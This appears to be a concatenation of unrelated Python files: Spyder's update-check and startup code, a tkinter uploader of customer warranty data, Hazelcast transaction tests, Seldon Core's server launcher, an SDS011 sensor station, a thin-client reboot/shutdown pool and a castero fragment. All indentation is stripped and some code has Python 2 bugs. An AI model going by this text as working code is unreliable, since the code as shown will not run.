latest_release = self.worker_updates.latest_release
error_msg = self.worker_updates.error
# Release url
url_r = __project_url__ + '/releases/tag/v{}'.format(latest_release)
url_i = 'https://docs.spyder-ide.org/installation.html'
# Define the custom QMessageBox
box = MessageCheckBox(icon=QMessageBox.Information,
parent=self)
box.setWindowTitle(_("New Spyder version"))
box.set_checkbox_text(_("Check for updates at startup"))
box.setStandardButtons(QMessageBox.Ok)
box.setDefaultButton(QMessageBox.Ok)
# Adjust the checkbox depending on the stored configuration
section, option = 'main', 'check_updates_on_startup'
check_updates = CONF.get(section, option)
box.set_checked(check_updates)
if error_msg is not None:
msg = error_msg
box.setText(msg)
box.set_check_visible(False)
box.exec_()
check_updates = box.is_checked()
else:
if update_available:
header = _("<b>Spyder {} is available!</b><br><br>").format(
latest_release)
footer = _(
"For more information visit our "
"<a href=\"{}\">installation guide</a>."
).format(url_i)
if is_anaconda():
content = _(
"<b>Important note:</b> Since you installed "
"Spyder with Anaconda, please <b>don't</b> use "
"<code>pip</code> to update it as that will break "
"your installation.<br><br>"
"Instead, run the following commands in a "
"terminal:<br>"
"<code>conda update anaconda</code><br>"
"<code>conda install spyder={}</code><br><br>"
).format(latest_release)
else:
content = _(
"Please go to <a href=\"{}\">this page</a> to "
"download it.<br><br>"
).format(url_r)
msg = header + content + footer
box.setText(msg)
box.set_check_visible(True)
box.exec_()
check_updates = box.is_checked()
elif feedback:
msg = _("Spyder is up to date.")
box.setText(msg)
box.set_check_visible(False)
box.exec_()
check_updates = box.is_checked()
# Update checkbox based on user interaction
CONF.set(section, option, check_updates)
# Enable check_updates_action after the thread has finished
self.check_updates_action.setDisabled(False)
# Provide feeback when clicking menu if check on startup is on
self.give_updates_feedback = True
@Slot()
def show_tour_message(self, force=False):
"""
Show message about starting the tour the first time Spyder starts.
"""
should_show_tour = CONF.get('main', 'show_tour_message')
if force or (should_show_tour and not running_under_pytest()
and not get_safe_mode()):
CONF.set('main', 'show_tour_message', False)
self.tour_dialog = tour.OpenTourDialog(
self, lambda: self.show_tour(DEFAULT_TOUR))
self.tour_dialog.show()
@Slot()
def check_updates(self, startup=False):
"""
Check for spyder updates on github releases using a QThread.
"""
from spyder.workers.updates import WorkerUpdates
# Disable check_updates_action while the thread is working
self.check_updates_action.setDisabled(True)
if self.thread_updates is not None:
self.thread_updates.terminate()
self.thread_updates = QThread(self)
self.worker_updates = WorkerUpdates(self, startup=startup)
self.worker_updates.sig_ready.connect(self._check_updates_ready)
self.worker_updates.sig_ready.connect(self.thread_updates.quit)
self.worker_updates.moveToThread(self.thread_updates)
self.thread_updates.started.connect(self.worker_updates.start)
self.thread_updates.start()
# --- For OpenGL
def _test_setting_opengl(self, option):
"""Get the current OpenGL implementation in use"""
if option == 'software':
return QCoreApplication.testAttribute(Qt.AA_UseSoftwareOpenGL)
elif option == 'desktop':
return QCoreApplication.testAttribute(Qt.AA_UseDesktopOpenGL)
elif option == 'gles':
return QCoreApplication.testAttribute(Qt.AA_UseOpenGLES)
#==============================================================================
# Utilities for the 'main' function below
#==============================================================================
def create_application():
"""Create application and patch sys.exit."""
# Our QApplication
app = qapplication()
# --- Set application icon
app_icon = QIcon(get_image_path("spyder.svg"))
app.setWindowIcon(app_icon)
# Required for correct icon on GNOME/Wayland:
if hasattr(app, 'setDesktopFileName'):
app.setDesktopFileName('spyder')
#----Monkey patching QApplication
class FakeQApplication(QApplication):
"""Spyder's fake QApplication"""
def __init__(self, args):
self = app # analysis:ignore
@staticmethod
def exec_():
"""Do nothing because the Qt mainloop is already running"""
pass
from qtpy import QtWidgets
QtWidgets.QApplication = FakeQApplication
# ----Monkey patching sys.exit
def fake_sys_exit(arg=[]):
pass
sys.exit = fake_sys_exit
# ----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+
if PYQT5:
def spy_excepthook(type_, value, tback):
sys.__excepthook__(type_, value, tback)
sys.excepthook = spy_excepthook
# Removing arguments from sys.argv as in standard Python interpreter
sys.argv = ['']
return app
def create_window(app, splash, options, args):
"""
Create and show Spyder's main window and start QApplication event loop.
"""
# Main window
main = MainWindow(splash, options)
try:
main.setup()
except BaseException:
if main.console is not None:
try:
main.console.exit_interpreter()
except BaseException:
pass
raise
main.show()
main.post_visible_setup()
if main.console:
namespace = CONF.get('internal_console', 'namespace', {})
main.console.start_interpreter(namespace)
main.console.set_namespace_item('spy', Spy(app=app, window=main))
# Don't show icons in menus for Mac
if sys.platform == 'darwin':
QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True)
# Open external files with our Mac app
if sys.platform == "darwin":
app.sig_open_external_file.connect(main.open_external_file)
app._has_started = True
if hasattr(app, '_pending_file_open'):
if args:
args = app._pending_file_open + args
else:
args = app._pending_file_open
# Open external files passed as args
if args:
for a in args:
main.open_external_file(a)
# To give focus again to the last focused widget after restoring
# the window
app.focusChanged.connect(main.change_last_focused_widget)
if not running_under_pytest():
app.exec_()
return main
#==============================================================================
# Main
#==============================================================================
def main(options, args):
"""Main function"""
# **** For Pytest ****
if running_under_pytest():
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
app = create_application()
window = create_window(app, None, options, None)
return window
# **** Handle hide_console option ****
if options.show_console:
print("(Deprecated) --show console does nothing, now the default "
" behavior is to show the console, use --hide-console if you "
"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize
or bool(get_debug_level()))
# **** Set OpenGL implementation to use ****
# This attibute must be set before creating the application.
# See spyder-ide/spyder#11227
if options.opengl_implementation:
option = options.opengl_implementation
set_opengl_implementation(option)
else:
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
# **** Set high DPI scaling ****
# This attribute must be set before creating the application.
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling,
CONF.get('main', 'high_dpi_scaling'))
# **** Set debugging info ****
setup_logging(options)
# **** Create the application ****
app = create_application()
# **** Create splash screen ****
splash = create_splash_screen()
if splash is not None:
splash.show()
splash.showMessage(
_("Initializing..."),
int(Qt.AlignBottom | Qt.AlignCenter | Qt.AlignAbsolute),
QColor(Qt.white)
)
QApplication.processEvents()
if options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults()
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# **** Read faulthandler log file ****
faulthandler_file = get_conf_path('faulthandler.log')
previous_crash = ''
if osp.exists(faulthandler_file):
with open(faulthandler_file, 'r') as f:
previous_crash = f.read()
# Remove file to not pick it up for next time.
try:
dst = get_conf_path('faulthandler.log.old')
shutil.move(faulthandler_file, dst)
except Exception:
pass
CONF.set('main', 'previous_crash', previous_crash)
# **** Create main window ****
mainwindow = None
try:
if PY3 and options.report_segfault:
import faulthandler
with open(faulthandler_file, 'w') as f:
faulthandler.enable(file=f)
mainwindow = create_window(app, splash, options, args)
else:
mainwindow = create_window(app, splash, options, args)
except FontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('appearance', 'icon_theme', 'spyder 2')
if mainwindow is None:
# An exception occurred
if splash is not None:
splash.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
frame_top.py
|
from tkinter import Frame, Label, Button, messagebox, filedialog as fd
from tkinter.constants import DISABLED, E, NORMAL, RAISED, SUNKEN, X
import pandas
import requests
from threading import Thread
import json
from messages import messages
from utils import config
from ibuki import Ibuki
class TopFrame(Frame):
def __init__(self, parent):
super().__init__(parent, highlightcolor='black',
highlightthickness=2, padx=10, pady=10)
self.btn_select_input = Button(self, text='Select input file and upload', width=22, bg='yellow',
fg='blue', font=10, cursor='hand2', command=self.select_file)
self.btn_select_input.grid(row=0, column=0)
btn_view = Button(self, text='Extended warranty view',
width=18, bg='yellow', fg='blue', font=10, padx=10, cursor='hand2', command=self.view_extended_warranty_customers)
btn_view.grid(row=0, column=1)
btn_send_sms = Button(self, text='Send SMS', width=10,
bg='yellow', fg='red', font=10, padx=10, cursor='hand2', command=self.send_sms)
btn_send_sms.grid(row=0, column=2, sticky=E)
self.columnconfigure(2, weight=4)
self.columnconfigure(1, weight=2)
def select_file(self):
filetypes = (
('excel files', '*.xlsx'),
('All files', '*.*')
)
try:
select_folder = config.selectFolder or './'
filename = fd.askopenfilename(
title='Open customer data',
initialdir=select_folder,
filetypes=filetypes
)
data = self.get_json(filename)
self.enable_disable_button(self.btn_select_input, False)
s = Thread(target=self.upload_data, args=(data,))
s.start()
except(Exception) as error:
messagebox.showerror(
'Error', error or messages.get('errSelectingFile'))
self.enable_disable_button(self.btn_select_input, True)
def get_json(self, filename):
df = pandas.read_excel(filename, converters={'Purchased Date': str, 'Serial No': str}, header=1, usecols=['ASC Code', 'Customer Group', 'Job ID', 'Warranty Type', 'Warranty Category', 'Service Type', 'Product category name',
'Product sub category name', 'Set Model', 'Model Name', 'Serial No', 'Purchased Date', 'Customer Name', 'Mobile No', 'Postal Code', 'Address'
])
json_str = df.to_json(orient='index')
js = json_str.encode('ascii', "ignore").decode()
js = js.replace(u'\\ufeff', '').replace('\\/', '').replace("\'", '')
jsn = json.loads(js)
temp_data = [value for key, value in jsn.items()]
filtered = filter(
lambda value: ('TV' in value.get(
'Product category name', '').upper())
and (value.get('Purchased Date', None) is not None)
and (value.get('Purchased Date', '').strip() != ''), temp_data)
data = [item for item in filtered]
return(data)
def upload_data(self, data):
try:
upload_endpoint = config.uploadEndPoint
requests.post(upload_endpoint, json=data)
messagebox.showinfo("Success", messages['infoUploadSuccess'])
self.enable_disable_button(self.btn_select_input, True)
except(Exception) as error:
messagebox.showerror('Error', error or 'Upload error')
self.enable_disable_button(self.btn_select_input, True)
def enable_disable_button(self, btn, isEnabled):
btn.configure(relief=RAISED if isEnabled else SUNKEN)
btn.configure(state=NORMAL if isEnabled else DISABLED)
def view_extended_warranty_customers(self):
Ibuki.emit('VIEW-EXTENDED-WARRANTY-CUSTOMERS', None)
def send_sms(self):
Ibuki.emit('SEND-SMS', None)
def init_top_frame(root):
try:
frame_top = TopFrame(root)
frame_top.pack(fill=X, padx=10, pady=10)
except(Exception) as error:
messagebox.showerror('Error', error or messages.get('errGeneric'))
|
transaction_test.py
|
import time
from threading import Thread
import hazelcast
import hazelcast.transaction
from hazelcast.errors import TransactionError
from tests.base import SingleMemberTestCase
class TransactionTest(SingleMemberTestCase):
@classmethod
def configure_client(cls, config):
config["cluster_name"] = cls.cluster.id
return config
def test_begin_and_commit_transaction(self):
transaction = self.client.new_transaction()
transaction.begin()
self.assertIsNotNone(transaction.id)
self.assertEqual(transaction.state, hazelcast.transaction._STATE_ACTIVE)
transaction.commit()
self.assertEqual(transaction.state, hazelcast.transaction._STATE_COMMITTED)
def test_begin_and_rollback_transaction(self):
transaction = self.client.new_transaction()
transaction.begin()
self.assertIsNotNone(transaction.id)
self.assertEqual(transaction.state, hazelcast.transaction._STATE_ACTIVE)
transaction.rollback()
self.assertEqual(transaction.state, hazelcast.transaction._STATE_ROLLED_BACK)
def test_begin_transaction_twice(self):
transaction = self.client.new_transaction()
transaction.begin()
with self.assertRaises(TransactionError):
transaction.begin()
transaction.rollback()
def test_commit_inactive_transaction(self):
transaction = self.client.new_transaction()
with self.assertRaises(TransactionError):
transaction.commit()
def test_rollback_inactive_transaction(self):
transaction = self.client.new_transaction()
with self.assertRaises(TransactionError):
transaction.rollback()
def test_commit_transaction_twice(self):
transaction = self.client.new_transaction()
transaction.begin()
transaction.commit()
with self.assertRaises(TransactionError):
transaction.commit()
def test_rollback_transaction_twice(self):
transaction = self.client.new_transaction()
transaction.begin()
transaction.rollback()
with self.assertRaises(TransactionError):
transaction.rollback()
def test_commit_from_another_thread(self):
transaction = self.client.new_transaction()
t = Thread(target=transaction.begin)
t.start()
t.join()
with self.assertRaises(TransactionError):
transaction.commit()
def test_rollback_from_another_thread(self):
transaction = self.client.new_transaction()
t = Thread(target=transaction.begin)
t.start()
t.join()
with self.assertRaises(TransactionError):
transaction.rollback()
def test_operations_from_another_thread(self):
transaction = self.client.new_transaction()
ops = [
transaction.get_map,
transaction.get_list,
transaction.get_multi_map,
transaction.get_queue,
transaction.get_set,
]
t = Thread(target=transaction.begin)
t.start()
t.join()
for op in ops:
with self.assertRaises(TransactionError):
op("name")
def test_operations_before_transaction_started(self):
transaction = self.client.new_transaction()
ops = [
transaction.get_map,
transaction.get_list,
transaction.get_multi_map,
transaction.get_queue,
transaction.get_set,
]
for op in ops:
with self.assertRaises(TransactionError):
op("name")
def test_nested_transactions_not_allowed(self):
transaction = self.client.new_transaction()
transaction.begin()
nested_transaction = self.client.new_transaction()
with self.assertRaises(TransactionError):
nested_transaction.begin()
transaction.rollback()
def test_timeout(self):
transaction = self.client.new_transaction(timeout=0.001)
transaction.begin()
time.sleep(0.1)
with self.assertRaises(TransactionError):
transaction.commit()
def test_context_manager(self):
with self.client.new_transaction() as t:
self.assertEqual(t.state, hazelcast.transaction._STATE_ACTIVE)
self.assertEqual(t.state, hazelcast.transaction._STATE_COMMITTED)
def test_context_manager_rollback(self):
with self.assertRaises(RuntimeError):
with self.client.new_transaction() as t:
raise RuntimeError("error")
self.assertEqual(t.state, hazelcast.transaction._STATE_ROLLED_BACK)
|
microservice.py
|
import argparse
import importlib
import json
import logging
import multiprocessing as mp
import os
import sys
import threading
import time
from distutils.util import strtobool
from typing import Callable, Dict
from seldon_core import __version__, persistence
from seldon_core import wrapper as seldon_microservice
from seldon_core.app import (
StandaloneApplication,
UserModelApplication,
accesslog,
post_worker_init,
threads,
)
from seldon_core.flask_utils import ANNOTATIONS_FILE, SeldonMicroserviceException
from seldon_core.metrics import SeldonMetrics
from seldon_core.utils import getenv_as_bool, setup_tracing
logger = logging.getLogger(__name__)
PARAMETERS_ENV_NAME = "PREDICTIVE_UNIT_PARAMETERS"
HTTP_SERVICE_PORT_ENV_NAME = "PREDICTIVE_UNIT_HTTP_SERVICE_PORT"
GRPC_SERVICE_PORT_ENV_NAME = "PREDICTIVE_UNIT_GRPC_SERVICE_PORT"
METRICS_SERVICE_PORT_ENV_NAME = "PREDICTIVE_UNIT_METRICS_SERVICE_PORT"
FILTER_METRICS_ACCESS_LOGS_ENV_NAME = "FILTER_METRICS_ACCESS_LOGS"
LOG_LEVEL_ENV = "SELDON_LOG_LEVEL"
DEFAULT_LOG_LEVEL = "INFO"
DEFAULT_GRPC_PORT = 5000
DEFAULT_HTTP_PORT = 9000
DEFAULT_METRICS_PORT = 6000
DEBUG_ENV = "SELDON_DEBUG"
GUNICORN_ACCESS_LOG_ENV = "GUNICORN_ACCESS_LOG"
def start_servers(
target1: Callable, target2: Callable, target3: Callable, metrics_target: Callable
) -> None:
"""
Start servers
Parameters
----------
target1
Main flask process
target2
Auxilary flask process
"""
p2 = None
if target2:
p2 = mp.Process(target=target2, daemon=True)
p2.start()
p3 = None
if target3:
p3 = mp.Process(target=target3, daemon=True)
p3.start()
p4 = None
if metrics_target:
p4 = mp.Process(target=metrics_target, daemon=True)
p4.start()
target1()
if p2:
p2.join()
if p3:
p3.join()
if p4:
p4.join()
def parse_parameters(parameters: Dict) -> Dict:
"""
Parse the user object parameters
Parameters
----------
parameters
Returns
-------
"""
type_dict = {
"INT": int,
"FLOAT": float,
"DOUBLE": float,
"STRING": str,
"BOOL": bool,
}
parsed_parameters = {}
for param in parameters:
name = param.get("name")
value = param.get("value")
type_ = param.get("type")
if type_ == "BOOL":
parsed_parameters[name] = bool(strtobool(value))
else:
try:
parsed_parameters[name] = type_dict[type_](value)
except ValueError:
raise SeldonMicroserviceException(
"Bad model parameter: "
+ name
+ " with value "
+ value
+ " can't be parsed as a "
+ type_,
reason="MICROSERVICE_BAD_PARAMETER",
)
except KeyError:
raise SeldonMicroserviceException(
"Bad model parameter type: "
+ type_
+ " valid are INT, FLOAT, DOUBLE, STRING, BOOL",
reason="MICROSERVICE_BAD_PARAMETER",
)
return parsed_parameters
def load_annotations() -> Dict:
"""
Attempt to load annotations
Returns
-------
"""
annotations = {}
try:
if os.path.isfile(ANNOTATIONS_FILE):
with open(ANNOTATIONS_FILE, "r") as ins:
for line in ins:
line = line.rstrip()
parts = list(map(str.strip, line.split("=", 1)))
if len(parts) == 2:
key = parts[0]
value = parts[1][1:-1] # strip quotes at start and end
logger.info("Found annotation %s:%s ", key, value)
annotations[key] = value
else:
logger.info("Bad annotation [%s]", line)
except:
logger.error("Failed to open annotations file %s", ANNOTATIONS_FILE)
return annotations
class MetricsEndpointFilter(logging.Filter):
def filter(self, record):
return seldon_microservice.METRICS_ENDPOINT not in record.getMessage()
def setup_logger(log_level: str, debug_mode: bool) -> logging.Logger:
# set up log level
log_level_raw = os.environ.get(LOG_LEVEL_ENV, log_level.upper())
log_level_num = getattr(logging, log_level_raw, None)
if not isinstance(log_level_num, int):
raise ValueError("Invalid log level: %s", log_level)
logger.setLevel(log_level_num)
# Set right level on access logs
flask_logger = logging.getLogger("werkzeug")
flask_logger.setLevel(log_level_num)
if getenv_as_bool(FILTER_METRICS_ACCESS_LOGS_ENV_NAME, default=not debug_mode):
flask_logger.addFilter(MetricsEndpointFilter())
gunicorn_logger = logging.getLogger("gunicorn.access")
gunicorn_logger.addFilter(MetricsEndpointFilter())
logger.debug("Log level set to %s:%s", log_level, log_level_num)
# set log level for the imported microservice type
seldon_microservice.logger.setLevel(log_level_num)
logging.getLogger().setLevel(log_level_num)
for handler in logger.handlers:
handler.setLevel(log_level_num)
return logger
def main():
LOG_FORMAT = (
"%(asctime)s - %(name)s:%(funcName)s:%(lineno)s - %(levelname)s: %(message)s"
)
logging.basicConfig(level=logging.INFO, format=LOG_FORMAT)
logger.info("Starting microservice.py:main")
logger.info(f"Seldon Core version: {__version__}")
sys.path.append(os.getcwd())
parser = argparse.ArgumentParser()
parser.add_argument("interface_name", type=str, help="Name of the user interface.")
parser.add_argument(
"--service-type",
type=str,
choices=["MODEL", "ROUTER", "TRANSFORMER", "COMBINER", "OUTLIER_DETECTOR"],
default="MODEL",
)
parser.add_argument("--persistence", nargs="?", default=0, const=1, type=int)
parser.add_argument(
"--parameters", type=str, default=os.environ.get(PARAMETERS_ENV_NAME, "[]")
)
parser.add_argument(
"--log-level",
type=str,
choices=["DEBUG", "INFO", "WARNING", "ERROR"],
default=DEFAULT_LOG_LEVEL,
help="Log level of the inference server.",
)
parser.add_argument(
"--debug",
nargs="?",
type=bool,
default=getenv_as_bool(DEBUG_ENV, default=False),
const=True,
help="Enable debug mode.",
)
parser.add_argument(
"--tracing",
nargs="?",
default=int(os.environ.get("TRACING", "0")),
const=1,
type=int,
)
# gunicorn settings, defaults are from
# http://docs.gunicorn.org/en/stable/settings.html
parser.add_argument(
"--workers",
type=int,
default=int(os.environ.get("GUNICORN_WORKERS", "1")),
help="Number of Gunicorn workers for handling requests.",
)
parser.add_argument(
"--threads",
type=int,
default=int(os.environ.get("GUNICORN_THREADS", "10")),
help="Number of threads to run per Gunicorn worker.",
)
parser.add_argument(
"--max-requests",
type=int,
default=int(os.environ.get("GUNICORN_MAX_REQUESTS", "0")),
help="Maximum number of requests gunicorn worker will process before restarting.",
)
parser.add_argument(
"--max-requests-jitter",
type=int,
default=int(os.environ.get("GUNICORN_MAX_REQUESTS_JITTER", "0")),
help="Maximum random jitter to add to max-requests.",
)
parser.add_argument(
"--single-threaded",
type=int,
default=int(os.environ.get("FLASK_SINGLE_THREADED", "0")),
help="Force the Flask app to run single-threaded. Also applies to Gunicorn.",
)
parser.add_argument(
"--http-port",
type=int,
default=int(os.environ.get(HTTP_SERVICE_PORT_ENV_NAME, DEFAULT_HTTP_PORT)),
help="Set http port of seldon service",
)
parser.add_argument(
"--grpc-port",
type=int,
default=int(os.environ.get(GRPC_SERVICE_PORT_ENV_NAME, DEFAULT_GRPC_PORT)),
help="Set grpc port of seldon service",
)
parser.add_argument(
"--metrics-port",
type=int,
default=int(
os.environ.get(METRICS_SERVICE_PORT_ENV_NAME, DEFAULT_METRICS_PORT)
),
help="Set metrics port of seldon service",
)
parser.add_argument(
"--pidfile", type=str, default=None, help="A file path to use for the PID file"
)
parser.add_argument(
"--access-log",
nargs="?",
type=bool,
default=getenv_as_bool(GUNICORN_ACCESS_LOG_ENV, default=False),
const=True,
help="Enable gunicorn access log.",
)
args, remaining = parser.parse_known_args()
if len(remaining) > 0:
logger.error(
f"Unknown args {remaining}. Note since 1.5.0 this CLI does not take API type (REST, GRPC)"
)
sys.exit(-1)
parameters = parse_parameters(json.loads(args.parameters))
setup_logger(args.log_level, args.debug)
# set flask trace jaeger extra tags
jaeger_extra_tags = list(
filter(
lambda x: (x != ""),
[tag.strip() for tag in os.environ.get("JAEGER_EXTRA_TAGS", "").split(",")],
)
)
logger.info("Parse JAEGER_EXTRA_TAGS %s", jaeger_extra_tags)
annotations = load_annotations()
logger.info("Annotations: %s", annotations)
parts = args.interface_name.rsplit(".", 1)
if len(parts) == 1:
logger.info("Importing %s", args.interface_name)
interface_file = importlib.import_module(args.interface_name)
user_class = getattr(interface_file, args.interface_name)
else:
logger.info("Importing submodule %s", parts)
interface_file = importlib.import_module(parts[0])
user_class = getattr(interface_file, parts[1])
if args.persistence:
logger.info("Restoring persisted component")
user_object = persistence.restore(user_class, parameters)
persistence.persist(user_object, parameters.get("push_frequency"))
else:
user_object = user_class(**parameters)
http_port = args.http_port
grpc_port = args.grpc_port
metrics_port = args.metrics_port
# if args.tracing:
# tracer = setup_tracing(args.interface_name)
seldon_metrics = SeldonMetrics(worker_id_func=os.getpid)
# TODO why 2 ways to create metrics server
# seldon_metrics = SeldonMetrics(
# worker_id_func=lambda: threading.current_thread().name
# )
if args.debug:
# Start Flask debug server
def rest_prediction_server():
app = seldon_microservice.get_rest_microservice(user_object, seldon_metrics)
try:
user_object.load()
except (NotImplementedError, AttributeError):
pass
if args.tracing:
logger.info("Tracing branch is active")
from flask_opentracing import FlaskTracing
tracer = setup_tracing(args.interface_name)
logger.info("Set JAEGER_EXTRA_TAGS %s", jaeger_extra_tags)
FlaskTracing(tracer, True, app, jaeger_extra_tags)
app.run(
host="0.0.0.0",
port=http_port,
threaded=False if args.single_threaded else True,
)
logger.info(
"REST microservice running on port %i single-threaded=%s",
http_port,
args.single_threaded,
)
server1_func = rest_prediction_server
else:
# Start production server
def rest_prediction_server():
options = {
"bind": "%s:%s" % ("0.0.0.0", http_port),
"accesslog": accesslog(args.access_log),
"loglevel": args.log_level.lower(),
"timeout": 5000,
"threads": threads(args.threads, args.single_threaded),
"workers": args.workers,
"max_requests": args.max_requests,
"max_requests_jitter": args.max_requests_jitter,
"post_worker_init": post_worker_init,
}
if args.pidfile is not None:
options["pidfile"] = args.pidfile
app = seldon_microservice.get_rest_microservice(user_object, seldon_metrics)
UserModelApplication(
app,
user_object,
jaeger_extra_tags,
args.interface_name,
options=options,
).run()
logger.info("REST gunicorn microservice running on port %i", http_port)
server1_func = rest_prediction_server
def grpc_prediction_server():
if args.tracing:
from grpc_opentracing import open_tracing_server_interceptor
logger.info("Adding tracer")
tracer = setup_tracing(args.interface_name)
interceptor = open_tracing_server_interceptor(tracer)
else:
interceptor = None
server = seldon_microservice.get_grpc_server(
user_object,
seldon_metrics,
annotations=annotations,
trace_interceptor=interceptor,
)
try:
user_object.load()
except (NotImplementedError, AttributeError):
pass
server.add_insecure_port(f"0.0.0.0:{grpc_port}")
server.start()
logger.info("GRPC microservice Running on port %i", grpc_port)
while True:
time.sleep(1000)
server2_func = grpc_prediction_server
def rest_metrics_server():
app = seldon_microservice.get_metrics_microservice(seldon_metrics)
if args.debug:
app.run(host="0.0.0.0", port=metrics_port)
else:
options = {
"bind": "%s:%s" % ("0.0.0.0", metrics_port),
"accesslog": accesslog(args.access_log),
"loglevel": args.log_level.lower(),
"timeout": 5000,
"max_requests": args.max_requests,
"max_requests_jitter": args.max_requests_jitter,
"post_worker_init": post_worker_init,
}
if args.pidfile is not None:
options["pidfile"] = args.pidfile
StandaloneApplication(app, options=options).run()
logger.info("REST metrics microservice running on port %i", metrics_port)
metrics_server_func = rest_metrics_server
if hasattr(user_object, "custom_service") and callable(
getattr(user_object, "custom_service")
):
server3_func = user_object.custom_service
else:
server3_func = None
logger.info("Starting servers")
start_servers(server1_func, server2_func, server3_func, metrics_server_func)
if __name__ == "__main__":
main()
|
comstation.py
|
import threading
import typing
import nacl.signing
import time
import typing as tp
import logging.config
from .istation import IStation, StationData, STATION_VERSION, Measurement
from ..drivers.sds011 import SDS011_MODEL, SDS011
from collections import deque
from connectivity.config.logging import LOGGING_CONFIG
logging.config.dictConfig(LOGGING_CONFIG)
logger = logging.getLogger("sensors-connectivity")
def _read_data_thread(sensor: SDS011, q: deque, timeout: int) -> None:
while True:
meas = sensor.query()
timestamp = int(time.time())
q.append((meas, timestamp))
time.sleep(timeout)
class COMStation(IStation):
"""
Reads data from a serial port
"""
def __init__(self, config: dict) -> None:
super().__init__(config)
self.version: str = f"airalab-com-{STATION_VERSION}"
self.sensor: SDS011 = SDS011(config["comstation"]["port"])
work_period: int = int(config["comstation"]["work_period"])
self.sensor.set_work_period(work_time=int(work_period / 60))
self.geo: tp.List[float, float] = [0, 0]
if config["comstation"]["geo"]:
self.geo = config["comstation"]["geo"].split(",")
if "public_key" in config["comstation"] and config["comstation"]["public_key"]:
self.public = config["comstation"]["public_key"]
else:
signing_key = nacl.signing.SigningKey.generate()
verify_key = signing_key.verify_key
self.public = bytes(verify_key).hex()
logger.info(f"COMStation public key: {self.public}")
self.meas_data = {"pm25": 0, "pm10": 0, "timestamp": 0}
self.q = deque(maxlen=1)
threading.Thread(
target=_read_data_thread, args=(self.sensor, self.q, work_period)
).start()
def get_data(self) -> tp.List[StationData]:
meas = Measurement(self.public, SDS011_MODEL, 0, 0, self.meas_data)
if self.q:
values = self.q[0]
pm = values[0]
self.meas_data.update(
{"pm25": pm[0], "pm10": pm[1], "timestamp": values[1]}
)
meas = Measurement(
self.public,
SDS011_MODEL,
float(self.geo[0]),
float(self.geo[1]),
self.meas_data,
)
return [
StationData(
self.version, self.mac_address, time.time() - self.start_time, meas
)
]
|
threadpools.py
|
from polltask.tasks.thin_device.db.api import API
from xmlrpclib import ServerProxy
from oslo_config import cfg
from Queue import Queue
from polltask import logger
import subprocess
import threading
import socket
LOG = logger.get_default_logger(__name__)
CONF = cfg.CONF
CONF.import_opt('addrip', 'polltask.tasks.thin_device.device_manager')
class ConnectClient(object):
def __init__(self, queue=None, db=None, IP=None):
self.id = 0
self.IP = IP
self.mac = None
self.status="off-line"
self.db = db or API()
self.queue = queue
def get_client_ip(self, id):
try:
data = self.db.get_by_id(id)[0]
self.id = data.get('id', 0)
self.mac = data.get("MAC", None)
#if data and data['status'] == "on-line":
self.IP = data.get("ip", None)
except AttributeError, ValueError:
raise "Query less than this ID or no this device."
def start_dev(self):
try:
cmd = "wol -i {ip} {mac}".format(ip=self.IP, mac=self.mac)
result = subprocess.call(cmd.split(), shell=False)
#socket.setdefaulttimeout(10)
self.queue.put(result)
data = self.db.get_by_id(self.id)
status = data[0]['status'] if data else None
if status == self.status:
self.db.status(self.id, "waiting")
#self.db.status(self.id, self.status)
except Exception:
self.db.status(self.id, self.status)
self.queue.put(1)
def reboot(self):
try:
obj_instance=ServerProxy(CONF.addrip % self.IP)
socket.setdefaulttimeout(5)
result = obj_instance.reboot()
socket.setdefaulttimeout(None)
self.queue.put(result)
self.db.status(self.id, "waiting")
except Exception:
self.db.status(self.id, self.status)
self.queue.put(1)
def shutdown(self):
try:
obj_instance=ServerProxy(CONF.addrip % self.IP)
socket.setdefaulttimeout(5)
result = obj_instance.shutdown()
socket.setdefaulttimeout(None)
self.queue.put(result)
self.db.status(self.id, "waiting")
except Exception:
self.db.status(self.id, self.status)
self.queue.put(1)
class ConnectThread(object):
def __init__(self, device=[]):
self.device=device
self.threadpool = []
self.data = None
def start_threadpools(self):
queue = Queue(200)
for id in self.device:
conn = ConnectClient(queue=queue)
IP = conn.get_client_ip(id)
th = threading.Thread(target=conn.start_dev)
self.threadpool.append(th)
for th in self.threadpool:
th.start()
threading.Thread.join(th)
for i in xrange(len(self.device)):
LOG.info("start_device execute result %s" % queue.get())
self.data=queue
return queue
def reboot_threadpools(self):
queue = Queue(200)
for id in self.device:
conn = ConnectClient(queue=queue)
IP = conn.get_client_ip(id)
th = threading.Thread(target=conn.reboot)
self.threadpool.append(th)
for th in self.threadpool:
th.start()
threading.Thread.join(th)
for i in xrange(len(self.device)):
LOG.info("reboot execute result %s" % queue.get())
self.data=queue
return queue
def stop_threadpools(self):
queue = Queue(200)
for id in self.device:
conn = ConnectClient(queue=queue)
IP = conn.get_client_ip(id)
th = threading.Thread(target=conn.shutdown)
self.threadpool.append(th)
for th in self.threadpool:
th.start()
threading.Thread.join(th)
for i in xrange(len(self.device)):
LOG.info("stop execute result %s" % queue.get())
self.data=queue
return queue
if __name__=="__main__":
device = [6,7, 8,9,10,11,12,13,14,15]
m = ConnectThread(device)
#m.reboot_threadpools()
m.stop_threadpools()
for i in xrange(len(device)):
print m.data.get()
|
__main__.py
|
import curses
import sys
import threading
import re
import castero
from castero import helpers
from castero.config import Config
from castero.database import Database
from castero.display import Display
from castero.player import Player
def main():
database = Database()
# update fields in help menu text
for field in Config:
if "{%s}" % field in castero.__help__:
castero.__help__ = \
castero.__help__.replace(
"{%s}" % field,
Config[field].ljust(9)
)
elif "{%s|" % field in castero.__help__:
